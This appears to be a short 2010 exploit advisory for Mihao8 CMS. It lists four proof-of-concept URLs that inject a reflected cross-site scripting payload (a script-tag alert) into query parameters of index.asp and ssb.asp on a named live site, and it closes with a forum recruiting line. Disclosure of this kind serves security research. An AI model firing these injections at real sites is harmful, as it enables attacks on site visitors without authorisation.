# Exploit Title: Mihao8 CMS Multiple XSS Vulnerabilities
# Date: 2010-4-23
# Author: riusksk(泉哥)
# Blog:
http://riusksk.blogbus.com
# Tested on: [Windows 7]
=========================================================================================================================
o8o oooo oooo
`"' `888 `888
oooo d8b oooo oooo oooo .oooo.o 888 oooo .oooo.o 888 oooo
`888""8P `888 `888 `888 d88( "8 888 .8P' d88( "8 888 .8P'
888 888 888 888 `"Y88b. 888888. `"Y88b. 888888.
888 888 888 888 o. )88b 888 `88b. o. )88b 888 `88b.
d888b o888o `V88V"V8P' 8""888P' o888o o888o 8""888P' o888o o888o
=========================================================================================================================
Mihao8 CMS Multiple XSS Vulnerabilities
=========================================================================================================================
# Exploit Code :
=====================================================0x1=================================================================
http://www.mihao8.com/index.asp?forumID=2&subclassID=1&act=1&classicID=1>"><script>alert("riusksk")</script>&page=1
=====================================================0x3=================================================================
http://www.mihao8.com/index.asp?forumID=2&subclassID=1&act=1>"><script>alert("riusksk")</script>&classicID=1&page=1
=====================================================0x4=================================================================
http://www.mihao8.com/index.asp?forumID=2&subclassID=1>"><script>alert("riusksk")</script>&act=1&classicID=1&page=1
=====================================================0x5=================================================================
http://www.mihao8.com/ssb.asp?forumID=1&subclassID=1>"><script>alert("riusksk")</script>&act=1&classicID=1&page=1
=====================================================EOF=================================================================
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!